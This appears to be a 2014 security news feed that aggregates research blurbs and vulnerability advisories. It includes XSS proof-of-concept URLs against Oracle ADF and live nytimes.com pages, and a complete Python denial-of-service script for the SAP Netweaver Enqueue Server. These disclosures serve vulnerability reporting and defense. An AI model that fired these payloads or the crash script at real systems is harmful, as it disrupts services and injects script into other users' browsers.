October 15, 2014, 3:23 am
All SSL connections rely on a chain of trust. This chain of trust, a part of PKI, is established by certificate authorities (CAs), which serve as trust anchors to verify the validity of who a device thinks it is talking to. However, there are literally hundreds of CAs installed by default on your smartphone, some of which have cause for concern in their inclusion. In this report we do a deep dive from the perspective of Android, with comparisons drawn to iOS, to examine the CAs that come preloaded on these devices and the details about them.
more here............https://bluebox.com/blog/technical/questioning-the-chain-of-trust-investigations-into-the-root-certificates-on-mobile-devices/
![]()
↧
October 15, 2014, 6:40 am
SEC Consult Vulnerability Lab Security Advisory < 20141015-0 >======================================================================= title: Potential Cross-Site Scripting product: ADF Faces vulnerable version: 12.1.2.0 fixed version: versions with CPU Oct-2014 patch applied impact: low homepage: http://www.oracle.com/adf found: 2014-05-01 by: W. Ettlinger SEC Consult Vulnerability Lab https://www.sec-consult.com=======================================================================Vendor description:- -------------------"Oracle ADF is an end-to-end Java EE framework that simplifies applicationdevelopment by providing out-of-the-box infrastructure services and a visualand declarative development experience."URL: http://www.oracle.com/technetwork/developer-tools/adf/overview/index.htmlVulnerability overview/description:- -----------------------------------The ADF JSF implementation (ADF Faces) does not properly encode URLs specifiedas a target to the goButton component. As this behavior is neither intuitivenor documented in the component documentation [1] an application developer mayallow a user to specify destination URLs. In such an application, anattacker is able to specify JavaScript code that is executed in the victimsbrowser as soon as the victim clicks on the goButton component.[1] http://jdevadf.oracle.com/adf-richclient-demo/docs/tagdoc/af_goButton.htmlProof of concept:- -----------------The following snippet demonstrates a vulnerable JSF page:[...]<af:goButton destination="#{param['url']}" text="Continue to URL"/>[...]If this JSF page is called using the following URL, JavaScript code isinjected:http://<host>/<path>?test=%27*alert%28%27XSS!%27%29*%27As soon as the victim clicks on the goButton component the attackers code isexecuted.Vulnerable / tested versions:- -----------------------------The version 12.1.2.0 of ADF Faces was found to be vulnerable. This was thelatest version at the time of discovery.Vendor contact timeline:- ------------------------2014-05-21: Contacting vendor through secalert_us@oracle.com2014-05-22: Oracle confirms receipt of the advisory and says that vulnerability is being investigated (BUG ID: S0454750)2014-05-23: Oracle states that this vulnerability (when confirmed) will be addressed on an upcoming CPU2014-06-25: Oracle confirms vulnerability, says it will be addressed with the next CPU2014-10-14: Oracle publishes the CPU2014-10-15: SEC Consult releases a coordinated security advisorySolution:- ---------Update to the newest version.More information can be found at:http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.htmlWorkaround:- -----------As a workaround the "button" component can be used to replace the"goButton" component.Advisory URL:- -------------https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~SEC Consult Vulnerability LabSEC ConsultVienna - Bangkok - Frankfurt/Main - Montreal - Singapore - VilniusHeadquarter:Mooslackengasse 17, 1190 Vienna, AustriaPhone: +43 1 8903043 0Fax: +43 1 8903043 15Mail: research at sec-consult dot comWeb: https://www.sec-consult.comBlog: http://blog.sec-consult.comTwitter: https://twitter.com/sec_consultInterested to work with the experts of SEC Consult?Write to career@sec-consult.com ![]()
↧
↧
October 15, 2014, 7:35 am
A few months ago, when working on my slides for Insomni'hack, I had a few conversations with the Prezi security team. Among many defense-in-depth protections, they introduced some code forbidding access to private IP addresses. Their conversion backend (the one I exploited) was using Python urllib2, and the blacklist was implemented via the IPy library.
Given that I enjoy bypassing blacklists, I asked Prezi for this specific piece of code. And they gave it to me
more here...............http://www.agarri.fr/blog/
![]()
↧
October 15, 2014, 8:36 am
Some time ago while working on Windows 8, we came across a rather unusual piece of disassembly in some Microsoft binary files. This post describes some of our findings and how they are related to a Windows internal project called Warbird
Warbird is an enhancement of the license verification of Windows that is introduced in Windows 8/2012. The former system was too easy to intercept and to fake, so Microsoft decided to provide something that is harder to reverse engineer and to fake.
more here...........http://thisissecurity.net/2014/10/15/warbird-operation/
![]()
↧
October 15, 2014, 8:37 am
Following the recognition at Virus Bulletin 2014 of ESET’s research on Operation Windigo, I took the opportunity to ask Marc-Etienne Léveillé – who worked directly on the Operation Windigo report a few questions. Marc-Etienne is a malware researcher at ESET. He is interested in reverse engineering Linux and OS X malware. He is passionate about making links between different malware to have an overall view of how they are interconnected.
more here..........http://www.welivesecurity.com/2014/10/15/operation-windigo-good-job-eset-says-malware-author/
![]()
↧
↧
October 15, 2014, 8:39 am
OpenSSL Security Advisory [15 Oct 2014]
=======================================
SRTP Memory Leak (CVE-2014-3513)
================================
Severity: High
A flaw in the DTLS SRTP extension parsing code allows an attacker, who
sends a carefully crafted handshake message, to cause OpenSSL to fail
to free up to 64k of memory causing a memory leak. This could be
exploited in a Denial Of Service attack. This issue affects OpenSSL
1.0.1 server implementations for both SSL/TLS and DTLS regardless of
whether SRTP is used or configured. Implementations of OpenSSL that
have been compiled with OPENSSL_NO_SRTP defined are not affected.
OpenSSL 1.0.1 users should upgrade to 1.0.1j.
This issue was reported to OpenSSL on 26th September 2014, based on an original
issue and patch developed by the LibreSSL project. Further analysis of the issue
was performed by the OpenSSL team.
The fix was developed by the OpenSSL team.
Session Ticket Memory Leak (CVE-2014-3567)
==========================================
Severity: Medium
When an OpenSSL SSL/TLS/DTLS server receives a session ticket the
integrity of that ticket is first verified. In the event of a session
ticket integrity check failing, OpenSSL will fail to free memory
causing a memory leak. By sending a large number of invalid session
tickets an attacker could exploit this issue in a Denial Of Service
attack.
OpenSSL 1.0.1 users should upgrade to 1.0.1j.
OpenSSL 1.0.0 users should upgrade to 1.0.0o.
OpenSSL 0.9.8 users should upgrade to 0.9.8zc.
This issue was reported to OpenSSL on 8th October 2014.
The fix was developed by Stephen Henson of the OpenSSL core team.
SSL 3.0 Fallback protection
===========================
Severity: Medium
OpenSSL has added support for TLS_FALLBACK_SCSV to allow applications
to block the ability for a MITM attacker to force a protocol
downgrade.
Some client applications (such as browsers) will reconnect using a
downgraded protocol to work around interoperability bugs in older
servers. This could be exploited by an active man-in-the-middle to
downgrade connections to SSL 3.0 even if both sides of the connection
support higher protocols. SSL 3.0 contains a number of weaknesses
including POODLE (CVE-2014-3566).
OpenSSL 1.0.1 users should upgrade to 1.0.1j.
OpenSSL 1.0.0 users should upgrade to 1.0.0o.
OpenSSL 0.9.8 users should upgrade to 0.9.8zc.
https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00
https://www.openssl.org/~bodo/ssl-poodle.pdf
Support for TLS_FALLBACK_SCSV was developed by Adam Langley and Bodo Moeller.
Build option no-ssl3 is incomplete (CVE-2014-3568)
==================================================
Severity: Low
When OpenSSL is configured with "no-ssl3" as a build option, servers
could accept and complete a SSL 3.0 handshake, and clients could be
configured to send them.
OpenSSL 1.0.1 users should upgrade to 1.0.1j.
OpenSSL 1.0.0 users should upgrade to 1.0.0o.
OpenSSL 0.9.8 users should upgrade to 0.9.8zc.
This issue was reported to OpenSSL by Akamai Technologies on 14th October 2014.
The fix was developed by Akamai and the OpenSSL team.
References
==========
URL for this Security Advisory:
https://www.openssl.org/news/secadv_20141015.txt
Note: the online version of the advisory may be updated with additional
details over time.
For details of OpenSSL severity classifications please see:
https://www.openssl.org/about/secpolicy.html
![]()
↧
October 15, 2014, 8:41 am
Analysis of a new variant of the famous PoS malware
Between April and September 2014, the American retailer Home Depot was targeted by criminals who aimed to steal credit card information. The malware used during these attacks targets Point of Sale systems. Home Depot said that the cyber criminals stole 56 million of debit and credit card numbers from its customers.(1) G DATA SecurityLabs experts now discovered a new variant of this malware dubbed FrameworkPOS. Its main part is rather similar to the malware previously described by Trend Micro.(2) But the big difference is the way how stolen data is exfiltrated: the malware use DNS requests!
more here...........https://blog.gdatasoftware.com/blog/article/new-frameworkpos-variant-exfiltrates-data-via-dns-requests.html
![]()
↧
October 15, 2014, 10:08 am
Drupal 7 includes a database abstraction API to ensure that queries executed against the database are sanitized to prevent SQL injection attacks.
A vulnerability in this API allows an attacker to send specially crafted requests resulting in arbitrary SQL execution. Depending on the content of the requests this can lead to privilege escalation, arbitrary PHP execution, or other attacks.
more here..........https://www.drupal.org/SA-CORE-2014-005
![]()
↧
October 15, 2014, 12:36 pm
The Netherlands was hit with a new spamrun designed to spread a cryptolocker variant known as torrentlocker from Monday October 13th 2014 onwards. Please note that torrentlocker appears to present itself to victims as cryptolocker in all cases. Fox-IT now receives multiple reports of new victims in the Netherlands and we are currently analyzing the new spamrun and malware that was subsequently used.
This blogpost is aimed at providing victims with advice on how to deal with the infections. It contains technical details that will help system administrators trace back the original infection, and contain the spread of the infection as much as possible. We will update this blog post as more information is available.
more here...........http://blog.fox-it.com/2014/10/15/torrentlocker-spreading-in-the-netherlands/
![]()
↧
↧
October 15, 2014, 1:50 pm
The keys to the kingdom pretty much always come down to acquiring source code for the web application you’re attacking from a blackbox perspective. This is a quick review of how I was able to get access to a particular client’s application source code using an extremely simple vulnerability: Directory Indexing. Interestingly enough, they also had a .git repository accessible at https://www.[redacted].com/.git/ (although the ‘why’ still baffles me). If you have access to this you also have access to any commits and all logs that may exist in the repo.
more here...........http://blog.whitehatsec.com/how-i-stole-source-code-with-directory-indexing-and-git/
![]()
↧
October 16, 2014, 2:07 am
RTSP… Real Time Streaming Protocol… is a protocol largely ignored these days. Once the infrastructure relied upon in the early days of multimedia (Video) and developed by RealNetworks, RTSP resides largely in the background of common protocols we pay attention to as InfoSec professionals these days.
Typically found on port 554, RTSP is still a factor in network and network exposures. Why? Because many (if not most) of the commercial IP cameras out there still utilize RTSP as a mechanism for streaming their video feeds.
Why hack RTSP credentials?
more here..........http://teksecgrp.com/2014/10/rtsp-brute-forcing-for-fun-and-naked-pictures/
![]()
↧
October 16, 2014, 2:28 am
Exploit Title: OpenX Open Redirect VulnerabilityProduct: OpenXVendor: OpenXVulnerable Versions: 2.8.10 and probably priorTested Version: 2.8.10Advisory Publication: OCT 8, 2014Latest Update: OCT 8, 2014Vulnerability Type: Open Redirect [CWE-601]CVE Reference: CVE-2014-2230Risk Level: LowCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)Solution Status: Solution AvailableCredit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]Vulnerability Details:OpenX adclick.php, ck.php, vulnerable to Open Redirect attacks.Source code of adclick.php:$destination = MAX_querystringGetDestinationUrl($adId[0]);MAX_redirect($destination);The "MAX_redirect" function is bellow,function MAX_redirect($url){if (!preg_match('/^(?:javascript|data):/i', $url)) {header('Location: '.$url);MAX_sendStatusCode(302);}The header() function sends a raw HTTP header to a client without anychecking of the "$dest" parameter at all.(1) For "adclick.php", the vulnerability occurs with "&dest" parameter.(2) For "ck.php", it uses "adclick.php" file. the vulnerability occurs with"_maxdest" parameter.Solutions:2014-10-12 Public disclosure with self-written patch.References:https://github.com/kriwil/OpenX/blob/master/www/index.phphttp://www.tetraph.com/blog/cves/cve-2014-2230-openx-open-redirect-vulnerability/http://www.openx.comhttp://cwe.mitre.orghttp://cve.mitre.org/ ![]()
↧
October 16, 2014, 2:31 am
Some months ago I analyzed some PDF exploits that I received via SPAM mails. They contained the vulnerability CVE-2013-2729 leading to a ZeuS-P2P / Gameover sample. Back in June I received more PDF exploits, containing the same vulnerability, but in these cases it was a bit more difficult to extract the shellcode because the code was obfuscated.
more here...........http://eternal-todo.com/blog/CVE-2013-2729-obfuscated-pdf-exploits
![]()
↧
↧
October 16, 2014, 2:33 am
In vulnerability research, and computer security, we often deal strictly in the intangible. There are times however when tangible attack vectors can play a big part in real-world attacks. In a lot of cases it is USB memory sticks and related that play a common physical role in aiding attacks. From Stuxnet leveraging USB to bridge air gap networks to BadUSB there are many examples worth taking note. That is why this weeks Microsoft Security Bulletin MS14-063 vulnerability in FastFat caught our eEye. - See more at: http://blog.beyondtrust.com/ms14-063-fastfat-vulnerability-fixed-years-ago#sthash.gUknQ5xW.dpuf
![]()
↧
October 16, 2014, 7:07 am
New York Times nytimes.com Page Design XSS Vulnerability (Almost allArticle Pages Before 2013 are Affected)Domain:http://www.nytimes.com/Vulnerability Description:The vulnerability occurs at New York Times’s URLs. Nytimes (short for NewYork Times) uses part of the URLs to construct its pages. However, it seemsthat Nytimes does not filter the content used for the construction at allbefore 2013.Based on Nytimes’s Design, Almost all URLs before 2013 are affected (Allpages of articles). In fact, all article pages that contain “PRINT” button,“SINGLE PAGE” button, “Page *” button, “NEXT PAGE” button are affected.Nytimes changed this mechanism since 2013. It decodes the URLs sent to itsserver. This makes the mechanism much safer now.However, all URLs before 2013 are still using the old mechanism. This meansalmost all article pages before 2013 are still vulnerable to XSS attacks. Iguess the reason Nytimes does not filter URLs before is cost. It costs toomuch (money & human capital) to change the database of all posted articlesbefore.Living POCs:http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/“><imgsrc=x onerror=prompt(‘justqdjing’)>http://www.nytimes.com/2011/01/09/travel/09where-to-go.html/“><img src=xonerror=prompt(‘justqdjing’)>?pagewanted=all&_r=0http://www.nytimes.com/2010/12/07/opinion/07brooks.html/“><img src=xonerror=prompt(‘justqdjing’)>http://www.nytimes.com/2009/08/06/technology/06stats.html/“><img src=xonerror=prompt(‘justqdjing’)>http://www.nytimes.com/2008/07/09/dining/091crex.html/“><img src=xonerror=prompt(‘justqdjing’)>http://www.nytimes.com/2007/11/14/opinion/lweb14brain.html/“><img src=xonerror=prompt(‘justqdjing’)>POC Video:https://www.youtube.com/user/tetraphVulnerability Analysis:Take the following link as an example,http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/“><vulnerabletoattackWe can see that for the page reflected, it contains the following codes.All of them are vulnerable.<li class=”print”><ahref=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”><vulnerabletoattack?pagewanted=print”>Print</testtesttest?pagewanted=print”></a></li><li class=”singlePage”><ahref=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”><testtesttest?pagewanted=all”>Single Page</vulnerabletoattack?pagewanted=all”></a> </li><li> <a onclick=”s_code_linktrack(‘Article-MultiPagePageNum2′);”title=”Page 2″href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”><vulnerabletoattack?pagewanted=2″>2</testtesttest?pagewanted=2″></a></li><li> <a onclick=”s_code_linktrack(‘Article-MultiPagePageNum3′);”title=”Page 3″href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”><vulnerabletoattack?pagewanted=3″>3</testtesttest?pagewanted=3″></a></li><a class=”next” onclick=”s_code_linktrack(‘Article-MultiPage-Next’);”title=”Next Page”href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”><vulnerabletoattack?pagewanted=2″>NextPage »</testtesttest?pagewanted=2″></a>The vulnerability can be attacked without user login. Tests were performedon Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7.Cross-site scripting (XSS) is a type of computer security vulnerabilitytypically found in Web applications. XSS enables attackers to injectclient-side script into Web pages viewed by other users. A cross-sitescripting vulnerability may be used by attackers to bypass access controlssuch as the same origin policy.Reported By:Wang Jing, mathematics student from Nanyang Technological University,Singapore.http://tetraph.com/wangjing/More Details:http://www.tetraph.com/blog/xss-vulnerability/new-york-times-nytimes-com-page-design-xss-vulnerability-almost-all-article-pages-are-affected/ ![]()
↧
October 16, 2014, 7:09 am
A lightweight packet capture application with
support for hardware timestamping (ns accuracy)
no external lib requirements (no libpcap)
TPACKET_V3 RX_RING using AF_PACKET
more here..........https://github.com/nccgroup/Watson
![]()
↧
October 16, 2014, 7:13 am
IIS Crypto is a free tool that gives administrators the ability to enable or disable protocols, ciphers, hashes and key exchange algorithms on Windows Server 2003, 2008 and 2012. It also lets you reorder SSL/TLS cipher suites offered by IIS, implement best practices with a single click and test your website.
more here..........https://www.nartac.com/Products/IISCrypto/Default.aspx
![]()
↧
↧
October 16, 2014, 9:35 am
Ben Broussard of Denim Group presented at OWASP Austin on 9/30 and highlighted a really interesting new kind of attack – Account Entrapment. - See more at: https://www.alienvault.com/blogs/security-essentials/account-entrapment-the-victim-is-tricked-into-playing-for-the-wrong-team-with-cookie-abuse#sthash.NGEG4dgZ.Jods5GTf.dpuf
![]()
↧
October 16, 2014, 10:55 am
Core Security - Corelabs Advisoryhttp://corelabs.coresecurity.com/SAP Netweaver Enqueue Server Trace Pattern Denial of Service Vulnerability1. **Advisory Information**Title: SAP Netweaver Enqueue Server Trace Pattern Denial of ServiceVulnerabilityAdvisory ID: CORE-2014-0007Advisory URL:http://www.coresecurity.com/advisories/sap-netweaver-enqueue-server-trace-pattern-denial-service-vulnerabilityDate published: 2014-10-15Date of last update: 2014-10-15Vendors contacted: SAPRelease mode: Coordinated release2. **Vulnerability Information****Class: Uncontrolled Recursion [CWE-674]Impact: Denial of serviceRemotely Exploitable: YesLocally Exploitable: NoCVE Name: CVE-2014-09953. **Vulnerability Description** SAP Netweaver [1] is a technology platform for building andintegrating SAP business applications. A vulnerability has been found in SAP Netweaverthat could allow an unauthenticated, remote attacker to create denial of serviceconditions. The vulnerability is triggered by sending a specially crafted SAP Enqueue Serverpacket to remote TCP port 32NN (NN being the SAP system number) of a host running the"Standalone Enqueue Server" service, part of SAP Netweaver Application Server ABAP/Java. The "StandaloneEnqueue Server" is a critical component of a SAP Netweaver installation in terms ofavailability, rendering the whole SAP system unresponsive.4. **Vulnerable Packages** . SAP Netweaver 7.01 (enserver.exe version v7010.32.15.63503). . SAP Netweaver 7.20 (enserver.exe version v7200.70.18.23869). Other versions are probably affected too, but they were not checked.5. **Vendor Information, Solutions and Workarounds** Martin Gallo proposed the following actions to mitigate theimpact of the vulnerabilities: Restrict access to the Standalone Enqueue service by configuringAccess Control Lists [4] and to the Standalone Enqueue Service TCP port 32XX (XX is the instancenumber). SAP published a security note [3] with the fix.6. **Credits** This vulnerability was discovered and researched by Martin Gallofrom Core Security Consulting Services. The publication of this advisory was coordinated byJoaquín Rodríguez Varela from Core Advisories Team.7. **Technical Description / Proof of Concept Code** When the trace level of the service is configured to stop loggingwhen a pattern is found [2], the service does not properly control the amount of recursionresulting in a stack overflow exception. The vulnerability can be triggered remotely by setting the tracelevel with a wildcard Trace Pattern. This vulnerability could allow a remote, unauthenticated attackerto conduct a denial of service attack against the vulnerable systems, rendering the EnqueueServer unavailable. The following python code can be used to trigger the vulnerability:7.1. **Proof of Concept**/-----import socket, structfrom optparse import OptionParser# Parse the target optionsparser = OptionParser()parser.add_option("-d", "--hostname", dest="hostname", help="Hostname",default="localhost")parser.add_option("-p", "--port", dest="port", type="int", help="Portnumber", default=3200)(options, args) = parser.parse_args()def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet)# Connectprint "[*] Connecting to", options.hostname, "port", options.portconnection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)connection.connect((options.hostname, options.port))print "[*] Sending crash packet"crash = '\xab\xcd\xe1\x23' # Magic bytescrash+= '\x00\x00\x00\x00' # Idcrash+= '\x00\x00\x00\x5b\x00\x00\x00\x5b' # Packet/frag lengthcrash+= '\x03\x00\x00\x00' # Destination/Opcode/MoreFrags/Typecrash+= 'ENC\x00' # Admin Eye-catchercrash+= '\x01\x00\x00\x00' # Versioncrash+= '#EAA' # Admin Eye-catchercrash+= '\x01\x00\x00\x00\x00' # Lencrash+= '\x06\x00\x00\x00\x00\x00' # Opcode/Flags/RCcrash+= '#EAE' # Admin Eye-catchercrash+= '\x01\x04\x00\x00' # Version/Action/Limit/Treadcrash+= '\x00\x00\x00\x00'crash+= '\x00\x00\x00\x03\x00\x00\x00\x03' # Trace Levelcrash+= '\x01' # Loggingcrash+= '\x01\x40\x00\x00' # Max file sizecrash+= '\x00\x00\x00\x01\x00\x00\x00\x01' # No. patternscrash+= '\x00\x00\x00\x25#EAH' # Trace Eye-catchercrash+= '\x01*\x00' # Trace Patterncrash+= '#EAD' # Trace Eye-catchersend_packet(connection, crash)print "[*] Crash sent !"-----/8. **Report Timeline**. 2014-06-02: Initial notification sent to SAP, including technicaldescription to reproduce the vulnerability. Publication date set to Jun 30, 2014.. 2014-06-03: Vendor notifies that the tracking number 1153917-2014 wascreated for this issue.. 2014-06-26: Core Security requests SAP to inform the status of the advisory.. 2014-06-30: The vendor informs they were not able to reproduce the issue andthey request additional details and a proof of concept.. 2014-06-30: Core Security sends SAP a full description of the vulnerabilityincluding a python script to trigger it.. 2014-07-11: Core Security asks if the vendor was able to trigger thevulnerability. Additinally we requested to set a publication date for the advisory based onthe release of a fix.. 2014-07-14: The vendor informs they were able to reproduce the issue butthey will not be able to provide a timeline for the fix at the time. They inform they will workwith high priority on it and will inform us of the planned fix release date.. 2014-08-12: Core Security asks if the vendor was able to develop a fix andif they have a possible timeline for its availability.. 2014-08-13: The vendor informs that the fix is undergoing quality checks.They also inform that they can't provide an exact date of publication yet. They also request a 3months grace period once the patch is available.. 2014-08-13: Core Security informs SAP that after we get notice that the fixis available to the public we will publish the advisory accordingly and will not wait for the 3months of grace as requested because that's not our proceeding policy.. 2014-08-18: The vendor informs that the fix is going to be released with theOctober patch day, on Tuesday the 14th, of 2014.. 2014-10-14: The vendor publishes the fix under the security note 2042845.. 2014-10-15: Core Security releases the advisory.9. **References**[1] http://www.sap.com/platform/netweaver/index.epx.[2]http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/e929ca3d7001cee10000000a421937/content.htm?frameset=/en/47/ea3ef600e83b8be10000000a421937/frameset.htm[3] SAP security note 2042845[4] https://websmp230.sap-ag.de/sap/support/notes/1495075.10. **About CoreLabs** CoreLabs, the research center of Core Security, is charged withanticipating the future needs and requirements for information securitytechnologies. We conduct our research in several important areas of computersecurity including system vulnerabilities, cyber attack planning andsimulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novelsolutions and prototypes for new technologies. CoreLabs regularly publishessecurity advisories, technical papers, project information and sharedsoftware tools for public use at: http://corelabs.coresecurity.com.11. **About Core Security** Core Security enables organizations to get ahead of threats withsecurity test and measurement solutions that continuously identify anddemonstrate real-world exposures to their most critical assets. Ourcustomers can gain real visibility into their security standing, realvalidation of their security controls, and real metrics to more effectivelysecure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company'sSecurity Consulting Services, CoreLabs and Engineering groups. Core Security can be reached at +1 (617) 399-6980 or on the Web at:http://www.coresecurity.com.12. **Disclaimer** The contents of this advisory are copyright (c) 2014 CoreSecurity and (c) 2014 CoreLabs, and are licensed under a Creative Commons Attribution Non-CommercialShare-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/13. **PGP/GPG Keys** This advisory has been signed with the GPG key of Core Securityadvisories team, which is available for download athttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.![]()
↧
October 17, 2014, 1:37 am
Some Whisper users monitored even after opting out of geolocation services
Company shares some information with US Department of Defense
User data collated and indefinitely stored in searchable database
more here.............http://www.theguardian.com/world/2014/oct/16/-sp-revealed-whisper-app-tracking-users
and here is a response that appears allegedly from Whispers CTO....https://news.ycombinator.com/item?id=8465980
![]()
↧